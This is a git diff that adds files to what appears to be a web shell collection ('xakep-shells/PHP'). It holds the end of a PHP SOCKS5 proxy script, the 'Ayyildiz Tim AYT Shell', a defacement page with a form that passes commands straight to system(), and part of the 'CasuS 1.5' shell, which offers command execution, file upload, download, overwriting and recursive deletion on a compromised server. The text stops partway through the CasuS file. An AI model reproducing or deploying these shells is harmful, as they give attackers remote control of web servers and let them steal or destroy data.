+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout, $blocked_hosts, $ipport;
+	$message = '';
+	if(($message = getstring($clientsockets[$id], 100)) === CLOSED_SOCKET){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	elseif($message === NO_DATA)
+		return NOT_ALL_DATA;
+        @$reqmessage[$id] .= $message;
+        // Checking the packet
+        if($reqmessage[$id][0] !== VER){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+
+	if(!isset($reqmessage[$id][1]))
+		return NOT_ALL_DATA;
+	if($reqmessage[$id][1] !== CONNECT)
+	{
+	        socket_getsockname ($clientsockets[$id], $addr, $port);
+		$addr = explode('.', $addr);
+		for($i = 0; $i < 4; $i++)
+			$addr[$i] = chr($addr[$i]);
+		$addr = implode('', $addr);
+	        sendstring($clientsockets[$id],	VER.REP_WRONG_COMMAND."\x00\x01\x00".
+		"\x00\x00\x00\x00\x00");
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	if(!isset($reqmessage[$id][2]))
+		return NOT_ALL_DATA;
+	if($reqmessage[$id][2] !== "\x00")
+	{
+		close($id);
+		return CLOSED_SOCKET;
+	}
+
+	if(!isset($reqmessage[$id][3]))
+		return NOT_ALL_DATA;
+
+	if($reqmessage[$id][3] !== DOMAIN && $reqmessage[$id][3] !== IPv4)
+	{
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	if(!isset($reqmessage[$id][4]))
+		return NOT_ALL_DATA;
+	if($reqmessage[$id][3] === DOMAIN){
+		$reqlen = ord($reqmessage[$id][4])+1;
+		if(!isset($reqmessage[$id][3+$reqlen]))
+			return NOT_ALL_DATA;
+		$host = substr($reqmessage[$id], 5, $reqlen-1);
+
+	}
+	else{ // IP v4
+		$reqlen = 4;
+ 		if(!isset($reqmessage[$id][3+$reqlen]))
+			return NOT_ALL_DATA;
+                $host = base_convert(bin2hex($reqmessage[$id][4]), 16, 10).'.'.
+			base_convert(bin2hex($reqmessage[$id][5]), 16, 10).'.'.
+			base_convert(bin2hex($reqmessage[$id][6]), 16, 10).'.'.
+			base_convert(bin2hex($reqmessage[$id][7]), 16, 10);
+	}
+	if(!isset($reqmessage[$id][3+$reqlen+2]))
+		return NOT_ALL_DATA;
+	socket_getsockname ($clientsockets[$id], $self_addr, $self_port);
+
+	$self_addr = explode('.', $self_addr);
+	for($i = 0; $i < 4; $i++)
+		$self_addr[$i] = chr($self_addr[$i]);
+	$self_add	= implode('', $self_addr);
+	$self_port	= pack('n', $self_port);
+	$ipport[$id]    = $self_add.$self_port;
+	
+	if(in_array($host, $blocked_hosts)){
+		
+	        sendstring($clientsockets[$id],	VER.REP_BLOCKED_HOST."\x00\x01".$ipport[$id]);
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);
+	// Connection to remote host
+	
+	$serversockets[$id]	= socket_create(AF_INET, SOCK_STREAM, 6 /* TCP*/);
+	if($serversockets[$id]	=== FALSE){
+		
+	        sendstring($clientsockets[$id],	VER.REP_SOCKS_ERROR."\x00\x01".$ipport[$id]);
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	socket_set_nonblock($serversockets[$id]);
+	//echo $host.':'.$port;
+	socket_connect($serversockets[$id], $host, $port);
+	unset($reqmessage[$id]);
+	$sockets_status[$id] = STATUS_CONNECTING;
+	
+}
+
+function Authorization($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout;
+	$message = '';
+	if(($message = getstring($clientsockets[$id], 100)) === CLOSED_SOCKET){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	elseif($message === NO_DATA)
+		return NOT_ALL_DATA;
+	@$reqmessage[$id] .= $message;
+	if($reqmessage[$id][0] != "\x01"){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	if(!isset($reqmessage[$id][1]))
+		return NOT_ALL_DATA;
+
+	$pos    = ord($reqmessage[$id][1])+2;
+	if(!isset($reqmessage[$id][$pos]))
+		return NOT_ALL_DATA;
+	if(!isset($reqmessage[$id][$pos+ord($reqmessage[$id][$pos])]))
+		return NOT_ALL_DATA;
+
+	// Authorization
+	if($settings['LOGIN']	 === substr($reqmessage[$id], 2, ord($reqmessage[$id][1]))
+	&& $settings['PASSWORD'] === substr($reqmessage[$id], $pos+1,
+	ord($reqmessage[$id][$pos])))
+	{
+	        $timeout[$id]		= time();
+		unset($reqmessage[$id]);
+		$sockets_status[$id]	= STATUS_REQUESTRECV;
+		sendstring($clientsockets[$id],	"\x01\x00");
+	}
+	else{
+		sendstring($clientsockets[$id],	"\x01\x01");
+		close($id);
+	}
+
+}
+
+function close($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout, $ipport;
+        socket_getpeername($clientsockets[$id], $ip);
+	@socket_close($clientsockets[$id]);
+        unset($clientsockets[$id]);
+	@socket_close($serversockets[$id]);
+	unset($serversockets[$id]);
+	unset($sockets_status[$id]);
+	unset($timeout[$id]);
+	unset($ipport[$id]);
+	
+	makelog($ip.' disconnected.');
+}
+
+function Start($id){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout;
+	$message = '';
+	if(($message = getstring($clientsockets[$id], 10)) === CLOSED_SOCKET){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+	
+	elseif($message === NO_DATA)
+		return NOT_ALL_DATA;
+        @$reqmessage[$id] .= $message;
+        // Checking the packet
+        if($reqmessage[$id][0] !== VER){
+		close($id);
+		return CLOSED_SOCKET;
+	}
+
+	if(!isset($reqmessage[$id][1]))
+		return NOT_ALL_DATA;
+
+	if(ord($reqmessage[$id][1]) > strlen($reqmessage[$id]) - 2)
+		return NOT_ALL_DATA;
+	elseif(ord($reqmessage[$id][1]) === strlen($reqmessage[$id]) - 2){
+		if($settings['AUTH'] !== 1){
+			sendstring($clientsockets[$id],	VER.AUTH_NOT_REQ);
+			unset($reqmessage[$id]);
+			$sockets_status[$id]	= STATUS_REQUESTRECV;
+			$timeout[$id]           = time();
+			return 0;
+		}
+	
+		if(strstr(substr($reqmessage[$id], 2, ord($reqmessage[$id][1])), AUTH_METHOD))
+		{
+		        $timeout[$id]		= time();
+			$sockets_status[$id]	= STATUS_RECVAUTHREQ;
+			sendstring($clientsockets[$id],	VER.AUTH_METHOD);
+			unset($reqmessage[$id]);
+			return 0;
+		}
+		else{
+			sendstring($clientsockets[$id],	VER.WRONG_AUTH_METHODS);
+			return 0;
+			close($id);
+			return CLOSED_SOCKET;
+		}
+		$sockets_status[$id] = STATUS_REQUEST;
+		return 0;
+	}
+	else{
+		close($id);
+		
+		return CLOSED_SOCKET;
+	}
+}
+
+function one_array($f, $s){
+	$new_array = array();
+	foreach($f as $elt)
+		if(!in_array($elt, $s))
+			array_push($new_array, $elt);
+	return array_merge_recursive($new_array, $s);
+
+}
+
+function makelog($string){
+	global $settings;
+	if($settings['LOG_FILE'] == -1)
+		return FALSE;
+	$fp = fopen($settings['LOG_FILE'], 'a');
+	fputs($fp, date("d.m.Y. H:i:s").'  '.$string."\r\n".
+	"---------------------------------------------------------\r\n");
+	fclose($fp);
+}
+
+function stop(){
+	global	$serversockets, $clientsockets, $sockets_status, $settings, $reqmessage,
+		$timeout;
+	for($i = 0; $i < sizeof($clientsockets); $i++)
+		close($i);
+	makelog('Finish!: '.$string);
+	DIE();
+}
+
+function error($string){
+	makelog('<<ERROR>>: '.$string);
+	stop();
+	DIE();
+}
+/*-------------------------------------------------------------------------------------*/
+
+/*-------------------------------------------------------------------------------------*\
+|                      	     P R O G R A M M                                    	|
+\*-------------------------------------------------------------------------------------*/
+
+$sock =	socket_create(AF_INET, SOCK_STREAM, 6 /* TCP*/) OR
+	DIE(socket_strerror(socket_last_error()));
+if(!socket_bind($sock,  "0.0.0.0", $settings['PORT']))
+	error(socket_strerror(socket_last_error($sock)));
+
+if(!socket_listen ($sock))
+	error(socket_strerror(socket_last_error($sock)));
+socket_set_nonblock($sock);
+$maxcount	= $settings['MAX_CONNECTIONS'] + 1;
+$sock		= array($sock);
+
+while(TRUE){
+
+	$readed = $wr = array_merge($sock, $clientsockets);
+	if(socket_select($readed, $wr, $exc = NULL, 7) < 1){
+           
+           if(file_exists($settings['STOPFILE']))
+                stop();
+           continue;
+	}
+	if (in_array($sock[0], $readed)){
+  		$clientsockets[] = ($cl_sock = socket_accept($sock[0]));
+  		socket_getpeername($cl_sock, $ip);
+  		makelog($ip.' connected to server.');
+		$id = array_search($cl_sock, $clientsockets);
+		if(count($clientsockets) >= $maxcount){
+			socket_close($cl_sock);
+			unset($clientsockets[$id]);
+			makelog('Connection with '.$ip.' has been aborted by server. '.
+			'Reason: too many connections.');
+		}
+		elseif(in_array($ip, $blocked_users)){
+			socket_close($newsock);
+			unset($clientsockets[$id]);
+			makelog('Connection with '.$ip.' has been aborted by server. '.
+			'Reason: banned user.');
+		}
+		else{
+	                socket_set_nonblock($cl_sock);
+	                $sockets_status[$id] = STATUS_RECVSTARTREQ;
+		}
+
+		$key = array_search($sock[0], $readed);
+		unset($readed[$key]);
+	}
+	$array_status = one_array($readed, $wr);
+	foreach($array_status as $socket){
+		$id = array_search($socket, $clientsockets);
+		if($id === FALSE)
+			$id = array_search($socket, $serversockets);
+		if($id === FALSE)
+			continue;
+		switch ($sockets_status[$id]){
+	 		case STATUS_RECVAUTHREQ:
+	 		        if(time() - $timeout[$id] > $settings['AUTH_TIMEOUT'])
+				{       //echo 'aaaaa';
+				 	close($id);
+				 	break;
+				}
+				Authorization($id);
+			break;
+	 		case STATUS_REQUESTRECV:
+
+				BridgeEstablish1($id);
+			break;
+			case STATUS_RECVSTARTREQ:
+				Start($id);
+					
+			break;
+			case STATUS_CONNECTING:
+				
+				if(time() - $timeout[$id] > $settings['CONNECT_TIMEOUT'])
+				{
+					sendstring($clientsockets[$id],	VER.REP_BAD_HOST.
+					"\x00\x01".$ipport[$id]);
+					close($id);
+				 	break;
+				}
+				// checkin remote host
+				$exr = $ewr = array($serversockets[$id]);
+				if(socket_select($exr, $ewr, $exc = NULL, 0) > 0)
+	 				BridgeEstablish2($id);
+			break;
+			default: // STATUS_WORKING
+			        $mes= getstring($clientsockets[$id], 8024);
+                                if($mes === CLOSED_SOCKET){
+					close($id);
+					break;
+				}
+				if($mes !== NO_DATA)
+				if(sendstring($serversockets[$id], $mes) === FALSE){
+					close($id);
+					break;
+				}
+                                $mes = getstring($serversockets[$id], 8024);
+                                if($mes === CLOSED_SOCKET){
+					close($id);
+					break;
+				}
+				if($mes !== NO_DATA)
+				if(sendstring($clientsockets[$id], $mes) === FALSE){
+					close($id);
+					break;
+				}
+			}
+				
+
+
+
+	}
+	if(rand(1,5) == 5)
+		if(file_exists($settings['STOPFILE']))
+			stop();
+}
+
+/*-------------------------------------------------------------------------------------*/
+?>
+
+
diff --git a/xakep-shells/PHP/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt b/xakep-shells/PHP/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt
new file mode 100644
index 0000000..e162769
--- /dev/null
+++ b/xakep-shells/PHP/Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt	
@@ -0,0 +1,317 @@
+<html>
+
+<head>
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>Ayyildiz Tim  | AYT | Shell v 2.1 Biz B&uuml;y&uuml;k T&uuml;rk Milletinin Hizmetindeyiz...</title>
+</head>
+
+<body>
+
+</body>
+
+</html>
+<html>
+<head>
+<meta name="distribution" content="GLOBAL">
+<META name="ROBOTS" content="ALL"> 
+<META NAME="RESOURCE-TYPE" CONTENT="DOCUMENT">
+<meta name="Copyright" content=TouCh By iJOo">
+<META NAME="RATING" CONTENT="GENERAL">
+<meta name="Description" content="Thehacker">
+<meta name="KeyWords" content="DefaCed">
+<title>HACKED BY AYYILDIZ �</title>
+<STYLE TYPE="text/css">
+<!--
+
+body { 
+scrollbar-3d-light-color : #404040;
+scrollbar-arrow-color: black;
+scrollbar-base-color: black;
+scrollbar-darkshadow-color: #404040;
+scrollbar-face-color: black;
+scrollbar-highlight-color: #404040;
+scrollbar-shadow-color: black;
+scrollbar-track-color: #404040; }
+-->
+</STYLE> 
+<script language="JavaScript1.2">
+function disableselect(e){
+return false
+}
+function reEnable(){
+return true
+}
+//if IE4+
+document.onselectstart=new Function ("return false")
+//if NS6
+if (window.sidebar){
+document.onmousedown=disableselect
+document.onclick=reEnable
+}
+</script>
+
+
+</head>
+<body bgcolor="#000000" text="#C0C0C0" link="#FFD9FF" vlink="#FFD9FF" alink="#00FF00">
+<bgsound src="bayrak.mp3" loop="infinite">
+
+<center><font color="red" size="10" face="Imprint MT Shadow">
+ </font>
+ <TR>
+    <TD vAlign=center align=left width=144>
+      <SCRIPT language=JavaScript1.2>if (document.all)document.body.style.cssText="border:25 ridge #404040"</SCRIPT>
+    </TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><BR>
+      <P align=left></P></TD></TR>
+  <TR>
+    <TD vAlign=center align=left width=144></TD>
+    <TD vAlign=center align=left width=5></TD>
+    <TD width=470><FONT color=#ffffff></FONT></TD></TR></TBODY></TABLE>
+<STYLE>BODY {
+	BORDER-RIGHT: #df827a 3px ridge; BORDER-TOP: #df827a 3px ridge; BORDER-LEFT: #df827a 3px ridge; SCROLLBAR-ARROW-COLOR: #ffffff; BORDER-BOTTOM: #df827a 3px ridge; SCROLLBAR-BASE-COLOR: #df827a
+}
+.ldtab1 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab2 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtab3 {
+	BORDER-RIGHT: #ffffff thin dotted; BORDER-TOP: #ffffff thin dotted; BORDER-LEFT: #ffffff thin dotted; BORDER-BOTTOM: #ffffff thin dotted
+}
+.ldtxt1 {
+	PADDING-RIGHT: 15px; PADDING-LEFT: 15px; FONT-WEIGHT: normal; FONT-SIZE: 14pt; PADDING-BOTTOM: 15px; OVERFLOW: auto; WIDTH: 500px; COLOR: #df3f1f; SCROLLBAR-ARROW-COLOR: #ffffff; PADDING-TOP: 15px; FONT-FAMILY: Comic Sans MS; SCROLLBAR-BASE-COLOR: #df827a; HEIGHT: 560px; TEXT-ALIGN: center
+}
+.ldtxt2 {
+	FONT-SIZE: 9pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:link {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:visited {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:active {
+	FONT-SIZE: 8pt; COLOR: #df3f1f; FONT-FAMILY: Comic Sans MS
+}
+A:hover {
+	BORDER-RIGHT: #df3f1f thin dotted; BORDER-TOP: #df3f1f thin dotted; FONT-SIZE: 9pt; BORDER-LEFT: #df3f1f thin dotted; COLOR: #df3f1f; BORDER-BOTTOM: #df3f1f thin dotted; FONT-FAMILY: Comic Sans MS
+}
+A {
+	TEXT-DECORATION: none
+}
+</STYLE>
+<!-- MELEK -->
+      <DIV align=center>
+      <DIV id=welle 
+      style="FONT-SIZE: 34pt; FILTER: Wave(freq=1, light=50, phase=50, strength=1); WIDTH: 100%; COLOR: #ffffff"><FONT 
+      color=#ff0000><FONT color=#ffffff><FONT color=#ff0000><FONT 
+      color=#ffffff><FONT color=#ff0000> <FONT color=#ffffff> </font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff></font><FONT color=#ffffff><FONT 
+      color=#ff0000></DIV></DIV>
+      <DIV align=center></DIV>
+      <SCRIPT language=JavaScript>
+
+<!--
+function welle()
+{
+if(document.all.welle.filters[0].freq > 10)
+document.all.welle.filters[0].freq = 5;
+document.all.welle.filters[0].freq += 1;
+if(document.all.welle.filters[0].phase > 100)
+document.all.welle.filters[0].phase = 0;
+document.all.welle.filters[0].phase += 10;
+if(document.all.welle.filters[0].strength > 10)
+document.all.welle.filters[0].strength = 1;
+document.all.welle.filters[0].strength += 1;
+window.setTimeout("welle()",100);
+}
+welle();
+file://-->
+</SCRIPT>
+      </FONT></TD></TR></TBODY></TABLE></DIV>
+
+
+<?php
+
+define('PHPSHELL_VERSION', '');
+
+?>
+
+<html>
+<head>
+<title>Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?></title>
+<style type="text/css">
+<!--
+.style1 {color: #FF0000}
+.style2 {
+	font-family: Tahoma;
+	font-size: 9px;
+	font-weight: bold;
+}
+-->
+</style>
+</head>
+<body>
+<div align="center">
+  <table width="918" height="484" border="15">
+    <tr>
+      <td width="880"><h1 align="center" class="style1"><img src="http://www.ayyildiz.org/board/images/shine/misc/logo.jpg" width="880" height="200"></h1>
+        <div align="center"><span class="style1"><?php echo PHPSHELL_VERSION ?></span>          <?php
+
+if (ini_get('register_globals') != '1') {
+  /* We'll register the variables as globals: */
+  if (!empty($HTTP_POST_VARS))
+    extract($HTTP_POST_VARS);
+  
+  if (!empty($HTTP_GET_VARS))
+    extract($HTTP_GET_VARS);
+
+  if (!empty($HTTP_SERVER_VARS))
+    extract($HTTP_SERVER_VARS);
+}
+
+/* First we check if there has been asked for a working directory. */
+if (!empty($work_dir)) {
+  /* A workdir has been asked for */
+  if (!empty($command)) {
+    if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {
+      /* We try and match a cd command. */
+      if ($regs[1][0] == '/') {
+        $new_dir = $regs[1]; // 'cd /something/...'
+      } else {
+        $new_dir = $work_dir . '/' . $regs[1]; // 'cd somedir/...'
+      }
+      if (file_exists($new_dir) && is_dir($new_dir)) {
+        $work_dir = $new_dir;
+      }
+      unset($command);
+    }
+  }
+}
+
+if (file_exists($work_dir) && is_dir($work_dir)) {
+  /* We change directory to that dir: */
+  chdir($work_dir);
+}
+
+/* We now update $work_dir to avoid things like '/foo/../bar': */
+$work_dir = exec('pwd');
+
+?>
+        </div>
+        <form name="myform" action="<?php echo $PHP_SELF ?>" method="post">
+          <p align="center"><strong>Bulundugunuz Dizin</strong>: <b>
+            <?php
+
+$work_dir_splitted = explode('/', substr($work_dir, 1));
+
+echo '<a href="' . $PHP_SELF . '?work_dir=/">Root</a>/';
+
+if (!empty($work_dir_splitted[0])) {
+  $path = '';
+  for ($i = 0; $i < count($work_dir_splitted); $i++) {
+    $path .= '/' . $work_dir_splitted[$i];
+    printf('<a href="%s?work_dir=%s">%s</a>/',
+           $PHP_SELF, urlencode($path), $work_dir_splitted[$i]);
+  }
+}
+
+?>
+          </b></p>
+          <p align="center"><strong>Dizin Degistir</strong> :
+              <select name="work_dir" onChange="this.form.submit()">
+                <?php
+/* Now we make a list of the directories. */
+$dir_handle = opendir($work_dir);
+/* Run through all the files and directories to find the dirs. */
+while ($dir = readdir($dir_handle)) {
+  if (is_dir($dir)) {
+    if ($dir == '.') {
+      echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
+    } elseif ($dir == '..') {
+      /* We have found the parent dir. We must be carefull if the parent 
+	 directory is the root directory (/). */
+      if (strlen($work_dir) == 1) {
+	/* work_dir is only 1 charecter - it can only be / There's no
+          parent directory then. */
+      } elseif (strrpos($work_dir, '/') == 0) {
+	/* The last / in work_dir were the first charecter.
+	   This means that we have a top-level directory
+	   eg. /bin or /home etc... */
+      echo "<option value=\"/\">Parent Directory</option>\n";
+      } else {
+      /* We do a little bit of string-manipulation to find the parent
+	 directory... Trust me - it works :-) */
+      echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
+      }
+    } else {
+      if ($work_dir == '/') {
+	echo "<option value=\"$work_dir$dir\">$dir</option>\n";
+      } else {
+	echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
+      }
+    }
+  }
+}
+closedir($dir_handle);
+
+?>
+              </select>
+          </p>
+          <p align="center"><strong>Komut</strong>:
+              <input type="text" name="command" size="60">
+              <input name="submit_btn" type="submit" value="Komut Calistir">
+          </p>
+          <p align="center"><strong>Surekli Bagli Kal</strong>  
+            <input type="checkbox" name="stderr">
+          </p>
+          
+        <div align="center">
+              <textarea name="textarea" cols="80" rows="20" readonly>
+
+<?php
+if (!empty($command)) {
+  if ($stderr) {
+    $tmpfile = tempnam('/tmp', 'phpshell');
+    $command .= " 1> $tmpfile 2>&1; " .
+    "cat $tmpfile; rm $tmpfile";
+  } else if ($command == 'ls') {
+    /* ls looks much better with ' -F', IMHO. */
+    $command .= ' -F';
+  }
+  system($command);
+}
+?>
+
+          </textarea>
+          </div>
+        </form>
+        <div align="center">
+            <script language="JavaScript" type="text/javascript">
+document.forms[0].command.focus();
+        </script>
+        </div>      <hr align="center">      <p align="center" class="style2">Copyright &copy; 2006&ndash;2007, Powered  byThehacker. v 2.1 - <a href="http|//www.ayyildiz.org" class="style1">www.ayyildiz.org</a> </p>
+        <p align="center" class="style2"> Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.</p>
+        <p align="center"><img src="http://ayyildiz.org/images/whosonline2.gif" width="60" height="45"> </p></td>
+    </tr>
+  </table>
+</div>
+</body>
+</html>
+
+
+
+
+</font></font></font></font></font></font></font></font></font></font></font>
+</font>
+
+
+<!--
+/*
+I Always Love Sha        
+*/
+
+</BODY></HTML>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Casus15.php.php.txt b/xakep-shells/PHP/Casus15.php.php.txt
new file mode 100644
index 0000000..d6f6fde
--- /dev/null
+++ b/xakep-shells/PHP/Casus15.php.php.txt
@@ -0,0 +1,368 @@
+<?php
+$default=$DOCUMENT_ROOT;
+$this_file="./casus15.php";
+
+
+
+if(isset($save)){
+$fname=str_replace(" ","_",$fname);
+$fname=str_replace("%20","_",$fname);
+header("Cache-control: private");
+header("Content-type: application/force-download");
+header("Content-Length: ".filesize($save));
+header("Content-Disposition: attachment; filename=$fname");
+
+$fp = fopen($save, 'r');
+fpassthru($fp);
+fclose($fp);
+unset($save);
+exit;
+}
+
+if ( function_exists('ini_get') ) {
+        $onoff = ini_get('register_globals');
+} else {
+        $onoff = get_cfg_var('register_globals');
+}
+if ($onoff != 1) {
+        @extract($_POST, EXTR_SKIP);
+        @extract($_GET, EXTR_SKIP);
+}
+
+
+function deltree($deldir) {
+        $mydir=@dir($deldir);
+        while($file=$mydir->read())        {
+                if((is_dir("$deldir/$file")) AND ($file!=".") AND ($file!="..")) {
+                        @chmod("$deldir/$file",0777);
+                        deltree("$deldir/$file");
+                }
+                if (is_file("$deldir/$file")) {
+                        @chmod("$deldir/$file",0777);
+                        @unlink("$deldir/$file");
+                }
+        }
+        $mydir->close();
+        @chmod("$deldir",0777);
+        echo @rmdir($deldir) ? "<center><b><font color='#0000FF'>SYLYNDY:$deldir/$file</b></font></center>" : "<center><font color=\"#ff0000\">Silinemedi:$deldir/$file</font></center>";
+        }
+
+if ($op=='phpinfo'){
+$fonk_kap = get_cfg_var("fonksiyonlary_kapat");
+        echo $phpinfo=(!eregi("phpinfo",$fonk_kapat)) ? phpinfo() : "<center>phpinfo() Komutu �aly?myyiii</center>";
+        exit;
+}
+
+if ($op=='me'){
+echo "<html>
+      <head>
+            <title>CEHENNEMDEN �IKAN �ILGIN T�RK</title>
+      </head>
+      <body bgcolor='#000000' text='#0000FF' link='#0000FF' vlink='#0000FF' alink='#00FF00'>
+      <center>Fazla s�ze gerek yok...</center>
+      <center><br>O yanlyz bir kovboy,<br>
+      <br>O cehennemden �ykan �ylgyn T�RK,<br>
+      <br>O bir rap manya?y,<br>
+      <br>O bir php coder,<br>
+      <br>O'nun hackten daha �ok sevdi?i tek ?ey iki hack,<br>
+      <br>O...<br>
+      <br>O'nun kim olduunu biliyorsunuz O tabiki...<br>
+      <br></center>";
+
+$sayi='7';
+while($sayi>=1){
+echo "<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'> EFENDISI</font> <font color='#FF0000'>MAFIABOY</font> </font></center>";
+$sayi--;
+}
+$sayi2='1';
+while($sayi2<=7){
+echo "<center><font size='$sayi2' color='#008000'>baddog@hotmail.com</font></center>";
+$sayi2++;
+};
+
+echo "</body>
+      </html>";
+exit;
+}
+
+
+echo "<html>
+      <head>
+             <title>CasuS 1.5 by MafiABoY</title>
+      </head>
+
+       <body bgcolor='#000000' text='#008000' link='#00FF00' vlink='#00FF00' alink='#00FF00'>
+       </body>";
+
+echo "<center><font size='+3' color='#FF0000'><b> CasuS 1.5!!! Powered by MafiABoY</b></font></center><br>
+      <center><font size='+2' color='#FFFFFF'>A TURKISH </font><font size='+2' color='#FF0000'>HACKER</font><br>
+      <br>";
+echo "<center><a href='./$this_file?dir=$dir'>ANA BOLUM</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=phpinfo' target='_blank'>PHP INFO</a></center>";
+echo "<br>";
+echo "<center><a href='./$this_file?op=wshell&dir=$dir'>WEB SHELL</a></center>";
+echo "<br>
+      <br>
+      <br>";
+echo "<center>---><a href='./$this_file?op=me' target='_blank'>MafiABoY</a><---</center>";
+
+echo "--------------------------------------------------------------------------------------------------------------------------------------------------------------------";
+echo "<div align=center>
+      <font size='+1' color='#0000FF'><u>Root Klas�r</u>: $DOCUMENT_ROOT</font><br>
+      <font size='+1'color='#0000FF'><u>CasuS 1.5'in URL'si</u>: http://$HTTP_HOST$REDIRECT_URL</font> <form method=post action=$this_file>";
+
+if(!isset($dir)){
+$dir="$default";
+}
+echo "<input type=text size=60 name=dir value='$dir'>
+<input type=submit value='GIT'><br>
+</form>
+</div>";
+
+if ($op=='wshell'){
+echo "<br><center><font size='+1' color='#FF0000'>WEBSHELL</font></center>";
+if (isset($ok)){
+if (empty($kod)){
+die ("<center><font color='#FF0000'>LEN MANYAK KOMUT YAZMAZSAN NE MOK Y?YNE YARAR</font><center>");
+}
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='$kod'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85 readonly>";
+system("$kod");
+echo "</TEXTAREA></center>";
+exit;
+
+} elseif (empty($ok)){
+echo "<form method='Post' action='./$this_file?op=wshell&dir=$dir'>
+      <br>";
+echo "<center><input type=text size=35 name=kod value='Calistirmak istediginiz komutu buraya girin'><input type=submit name=ok value='CALISTIR'>
+      <br>
+      <br></center></form>";
+echo "<center><TEXTAREA rows=30 cols=85></TEXTAREA></center>";
+exit;
+}
+}
+
+if ($op=='up'){
+        $path=dir;
+        echo "<br><br><center><font size='+1' color='#FF0000'><b>DOSYA GONDERME</b></font></center><br>";
+if(isset($dy)) {
+
+if(empty($dosya_gonder)){
+} else {
+copy ( $dosya_gonder, "$dir/$dosya_gonder_name") ? print("$dosya_gonder_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder2)){
+} else {
+copy ( $dosya_gonder2, "$dir/$dosya_gonder2_name") ? print("$dosya_gonder2_name <font color='#0000FF'>kopyaland</font>y<br>") : print("$dosya_gonder2_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder3)){
+} else {
+copy ( $dosya_gonder3, "$dir/$dosya_gonder3_name") ? print("$dosya_gonder3_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder3_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+if(empty($dosya_gonder4)){
+} else {
+copy ( $dosya_gonder4, "$dir/$dosya_gonder4_name") ? print("$dosya_gonder4_name <font color='#0000FF'>kopyalandy</font><br>") : print("$dosya_gonder4_name <font color='#FF0000'>kopyalanamady</font><br>");
+}
+
+} elseif(empty($dy )) {
+$path=$dir;
+$dir = $dosya_dizin;
+echo "$dir";
+echo "<FORM  ENCTYPE='multipart/form-data' ACTION='$this_file?op=up&dir=$path' METHOD='POST'>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder2'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder3'></center><br>";
+echo "<center><INPUT TYPE='file' NAME='dosya_gonder4'></center><br>";
+
+echo "<br><center><INPUT TYPE='SUBMIT' NAME='dy' VALUE='Dosya Yolla!'></center>";
+echo "</form>";
+
+
+echo "</html>";
+}
+}
+
+
+if($op=='mf'){
+    $path=$dir;
+    if(isset($dismi) && isset($kodlar)){
+                $ydosya="$path/$dismi";
+                if(file_exists("$path/$dismi")){
+                        $dos= "B�yle Bir Dosya Vardy �zerine Yazyldy";
+                } else {
+                        $dos = "Dosya Olu?turuldu";
+                }
+                touch ("$path/$dismi") or die("Dosya Olu?turulamyyor");
+                $ydosya2 = fopen("$ydosya", 'w') or die("Dosya yazmak i�in a�ylamyyor");
+                fwrite($ydosya2, $kodlar) or die("Dosyaya yazylamyyor");
+                fclose($ydosya2);
+                echo "<center><font color='#0000FF'>$dos</font></center>";
+        } else {
+
+        echo "<FORM METHOD='POST' ACTION='$this_file?op=mf&dir=$path'>";
+        echo "<center>Dosya Ysmi :<input type='text' name='dismi'></center><br>";
+    echo "<br>";
+    echo "<center>KODLAR</center><br>";
